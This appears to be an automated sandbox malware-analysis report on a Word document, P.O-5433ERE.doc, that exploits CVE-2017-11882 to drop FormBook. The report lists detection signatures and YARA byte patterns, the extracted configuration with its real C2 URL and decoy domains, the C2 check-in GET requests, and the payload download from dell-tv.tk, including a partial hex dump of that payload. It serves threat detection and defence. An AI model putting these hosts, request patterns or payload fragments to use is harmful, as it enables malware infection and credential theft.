Windows Analysis Report P.O-5433ERE.doc

Overview

General Information

Sample Name: P.O-5433ERE.doc
Analysis ID: 528734
MD5: 17ca06000e92058f0d43259b2683537c
SHA1: db453e5125310d209fe04fb0211677d79d25f3ee
SHA256: 3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1516 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2812 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ashlkyvc7592.exe (PID: 1528 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
      • ashlkyvc7592.exe (PID: 836 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmstp.exe (PID: 2580 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 00263CA2071DC9A6EE577EB356B0D1D9)
            • cmd.exe (PID: 2176 cmdline: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}

Yara Overview

Memory Dumps

Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group, Strings:
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(31 further memory dump entries not shown)

Unpacked PEs

Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group, Strings:
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(22 further unpacked PE entries not shown)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 37.0.9.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, NewProcessName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2812, ProcessCommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ProcessId: 1528
Sigma detected: CMSTP Execution Process Creation
Source: Process started, Author: Nik Seetharaman, Data: Command: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 2580, ProcessCommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", ProcessId: 2176

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}
Yara detected FormBook
Source: Yara match, File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr, Stream path '_1699368849/\x1CompObj' : ...........................F....Microsoft Equation
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
Source: global traffic, DNS query: name: dell-tv.tk
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, Code function: 4x nop then pop edi 5_2_0041566A
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, Code function: 4x nop then pop esi 5_2_004157F9
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop edi 7_2_000A566A
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop esi 7_2_000A57F9
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.texaszephyr.com
Source: C:\Windows\explorer.exe, Domain query: www.bandhancustomer.com
Source: C:\Windows\explorer.exe, Domain query: www.publicfigure.skin
Source: C:\Windows\explorer.exe, Network Connect: 172.67.184.102 80
Source: C:\Windows\explorer.exe, Domain query: www.volunteervabetweenk.com
Source: C:\Windows\explorer.exe, Domain query: www.1oavyx.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.fcusd4.com/op9t/
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: WKD-ASIE WKD-ASIE
Source: global traffic, HTTP traffic detected:
    GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1
    Host: www.texaszephyr.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic, HTTP traffic detected:
    GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1
    Host: www.publicfigure.skin
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic, HTTP traffic detected:
    GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1
    Host: www.volunteervabetweenk.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: Joe Sandbox View, IP Address: 37.0.9.166 37.0.9.166
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:08:39 GMTContent-Type: application/x-msdownloadContent-Length: 560128Last-Modified: Thu, 25 Nov 2021 01:30:41 GMTConnection: keep-aliveETag: "619ee741-88c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 e5 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 80 08 00 00 0a 00 00 00 00 00 00 16 9f 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 9e 08 00 4f 00 00 00 00 a0 08 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 7f 08 00 00 20 00 00 00 80 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 08 00 00 08 00 00 00 82 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 8a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9e 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b8 21 01 00 03 00 00 00 8c 01 00 06 64 6a 02 00 60 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00
Source: global traffic, HTTP traffic detected:
    GET /ashlyzx.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: dell-tv.tk
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 25 Nov 2021 17:10:32 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "618be75c-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
